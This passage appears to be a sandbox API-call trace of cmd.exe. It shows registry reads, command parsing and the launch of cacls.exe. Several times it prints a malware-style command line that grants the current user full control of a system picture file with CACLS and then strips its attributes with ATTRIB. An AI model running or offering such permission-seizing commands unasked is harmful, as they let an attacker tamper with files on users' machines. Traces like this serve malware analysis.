lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x0, lpData=0x2aeb00*=0xb8, lpcbData=0x2aeaf8*=0x1000) returned 0x2 [0187.058] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x4, lpData=0x2aeb00*=0x1, lpcbData=0x2aeaf8*=0x4) returned 0x0 [0187.058] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x0, lpData=0x2aeb00*=0x1, lpcbData=0x2aeaf8*=0x1000) returned 0x2 [0187.058] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x4, lpData=0x2aeb00*=0x0, lpcbData=0x2aeaf8*=0x4) returned 0x0 [0187.058] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x4, lpData=0x2aeb00*=0x40, lpcbData=0x2aeaf8*=0x4) returned 0x0 [0187.058] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x4, lpData=0x2aeb00*=0x40, lpcbData=0x2aeaf8*=0x4) returned 0x0 [0187.058] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x0, lpData=0x2aeb00*=0x40, lpcbData=0x2aeaf8*=0x1000) returned 0x2 [0187.058] RegCloseKey (hKey=0x40) returned 0x0 [0187.058] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aeaf4 | out: phkResult=0x2aeaf4*=0x40) returned 0x0 [0187.058] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x0, lpData=0x2aeb00*=0x40, lpcbData=0x2aeaf8*=0x1000) returned 0x2 [0187.058] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x4, lpData=0x2aeb00*=0x1, lpcbData=0x2aeaf8*=0x4) returned 0x0 [0187.059] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x0, lpData=0x2aeb00*=0x1, lpcbData=0x2aeaf8*=0x1000) returned 0x2 [0187.059] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x4, lpData=0x2aeb00*=0x0, lpcbData=0x2aeaf8*=0x4) returned 0x0 [0187.059] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x4, lpData=0x2aeb00*=0x9, lpcbData=0x2aeaf8*=0x4) returned 0x0 [0187.059] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x4, lpData=0x2aeb00*=0x9, lpcbData=0x2aeaf8*=0x4) returned 0x0 [0187.059] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x0, lpData=0x2aeb00*=0x9, lpcbData=0x2aeaf8*=0x1000) returned 0x2 [0187.059] RegCloseKey (hKey=0x40) returned 0x0 [0187.059] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886395 [0187.059] srand (_Seed=0x5b886395) [0187.059] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\"" [0187.059] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\"" [0187.059] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.059] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4b1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0187.059] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0187.059] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0187.059] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0187.059] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0187.059] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0187.059] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0187.060] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0187.060] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0187.060] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0187.060] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0187.060] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0187.060] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0187.060] GetEnvironmentStringsW () returned 0x4b2458* [0187.060] FreeEnvironmentStringsW (penv=0x4b2458) returned 1 [0187.060] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.060] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0187.060] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0187.060] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0187.060] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0187.060] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0187.060] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0187.060] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0187.060] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0187.060] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0187.060] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af8c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.060] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af8c0, lpFilePart=0x2af8bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af8bc*="Desktop") returned 0x18 [0187.060] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0187.060] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af63c | out: lpFindFileData=0x2af63c) returned 0x4b0ae8 [0187.061] FindClose (in: hFindFile=0x4b0ae8 | out: hFindFile=0x4b0ae8) returned 1 [0187.061] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af63c | out: lpFindFileData=0x2af63c) returned 0x4b0ae8 [0187.061] FindClose (in: hFindFile=0x4b0ae8 | out: hFindFile=0x4b0ae8) returned 1 [0187.061] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af63c | out: lpFindFileData=0x2af63c) returned 0x4b0ae8 [0187.061] FindClose (in: hFindFile=0x4b0ae8 | out: hFindFile=0x4b0ae8) returned 1 [0187.061] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0187.061] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0187.061] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0187.061] GetEnvironmentStringsW () returned 0x4b0308* [0187.061] FreeEnvironmentStringsW (penv=0x4b0308) returned 1 [0187.061] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.062] GetConsoleOutputCP () returned 0x1b5 [0187.100] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0187.100] GetUserDefaultLCID () returned 0x409 [0187.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0187.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afa00, cchData=128 | out: lpLCData="0") returned 2 [0187.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2afa00, cchData=128 | out: lpLCData="0") returned 2 [0187.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afa00, cchData=128 | out: lpLCData="1") returned 2 [0187.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0187.100] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0187.101] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0187.101] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0187.101] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0187.101] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0187.101] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0187.101] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0187.101] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0187.101] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0187.101] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0187.102] GetConsoleTitleW (in: lpConsoleTitle=0x4a09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.102] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0187.102] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0187.102] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0187.102] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0187.103] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0187.103] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0187.103] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0187.103] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0187.103] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0187.103] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0187.103] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0187.103] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0187.106] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0187.106] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0187.106] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0187.106] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0187.106] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0187.106] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0187.106] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0187.108] GetConsoleTitleW (in: lpConsoleTitle=0x2af694, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.108] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0187.108] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0187.108] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0187.108] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0187.108] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0187.108] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0187.108] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0187.108] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0187.108] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0187.108] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0187.108] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0187.108] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0187.108] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0187.108] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0187.108] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0187.108] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0187.108] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0187.108] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0187.108] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0187.109] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0187.109] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0187.109] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0187.109] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0187.109] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0187.109] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0187.109] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0187.109] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0187.109] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0187.109] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0187.109] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0187.109] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0187.109] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0187.109] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0187.109] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0187.109] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0187.109] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0187.109] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0187.109] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0187.109] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0187.109] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0187.109] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0187.109] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0187.109] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0187.109] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0187.109] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0187.109] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0187.109] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0187.109] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0187.109] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0187.109] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0187.109] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0187.109] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0187.109] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0187.109] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0187.109] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0187.109] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0187.109] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0187.109] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0187.109] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0187.109] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0187.109] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0187.109] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0187.109] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0187.109] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0187.109] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0187.109] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0187.109] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0187.109] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0187.110] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0187.110] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0187.110] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0187.110] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0187.110] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0187.110] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0187.110] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0187.110] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0187.110] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0187.110] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0187.110] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0187.110] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0187.110] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0187.110] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0187.110] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0187.110] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0187.110] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0187.110] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0187.110] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0187.110] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0187.110] SetErrorMode (uMode=0x0) returned 0x0 [0187.110] SetErrorMode (uMode=0x1) returned 0x0 [0187.110] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4b1e98, lpFilePart=0x2af1b4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af1b4*="Desktop") returned 0x18 [0187.110] SetErrorMode (uMode=0x0) returned 0x1 [0187.111] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0187.111] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0187.116] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0187.117] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2aef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef30) returned 0xffffffff [0187.117] GetLastError () returned 0x2 [0187.117] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x2aef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef30) returned 0xffffffff [0187.118] GetLastError () returned 0x2 [0187.118] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2aef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef30) returned 0x4b2180 [0187.118] FindClose (in: hFindFile=0x4b2180 | out: hFindFile=0x4b2180) returned 1 [0187.118] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2aef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef30) returned 0xffffffff [0187.118] GetLastError () returned 0x2 [0187.118] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef30) returned 0x4b2180 [0187.118] FindClose (in: hFindFile=0x4b2180 | out: hFindFile=0x4b2180) returned 1 [0187.118] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0187.118] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0187.118] GetConsoleTitleW (in: lpConsoleTitle=0x2af428, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.119] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af2b0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af378 | out: lpAttributeList=0x2af2b0, lpSize=0x2af378) returned 1 [0187.119] UpdateProcThreadAttribute (in: lpAttributeList=0x2af2b0, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af370, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af2b0, lpPreviousValue=0x0) returned 1 [0187.119] GetStartupInfoW (in: lpStartupInfo=0x2af26c | out: lpStartupInfo=0x2af26c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0187.119] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0187.120] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af30c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af358 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x2af358*(hProcess=0x50, hThread=0x4c, dwProcessId=0xe90, dwThreadId=0xd58)) returned 1 [0187.122] CloseHandle (hObject=0x4c) returned 1 [0187.122] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0187.122] GetEnvironmentStringsW () returned 0x4b0308* [0187.122] FreeEnvironmentStringsW (penv=0x4b0308) returned 1 [0187.122] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0187.315] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2af24c | out: lpExitCode=0x2af24c*=0x0) returned 1 [0187.315] CloseHandle (hObject=0x50) returned 1 [0187.316] _vsnwprintf (in: _Buffer=0x2af394, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af258 | out: _Buffer="00000000") returned 8 [0187.316] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0187.316] GetEnvironmentStringsW () returned 0x4b2410* [0187.316] FreeEnvironmentStringsW (penv=0x4b2410) returned 1 [0187.316] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0187.316] GetEnvironmentStringsW () returned 0x4b2410* [0187.316] FreeEnvironmentStringsW (penv=0x4b2410) returned 1 [0187.316] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af2b0 | out: lpAttributeList=0x2af2b0) [0187.316] GetConsoleTitleW (in: lpConsoleTitle=0x2af694, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.316] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0187.316] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0187.317] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0187.317] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2aef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef30) returned 0xffffffff [0187.317] GetLastError () returned 0x2 [0187.317] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x2aef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef30) returned 0xffffffff [0187.317] GetLastError () returned 0x2 [0187.317] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2aef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef30) returned 0x4ae4d8 [0187.317] FindClose (in: hFindFile=0x4ae4d8 | out: hFindFile=0x4ae4d8) returned 1 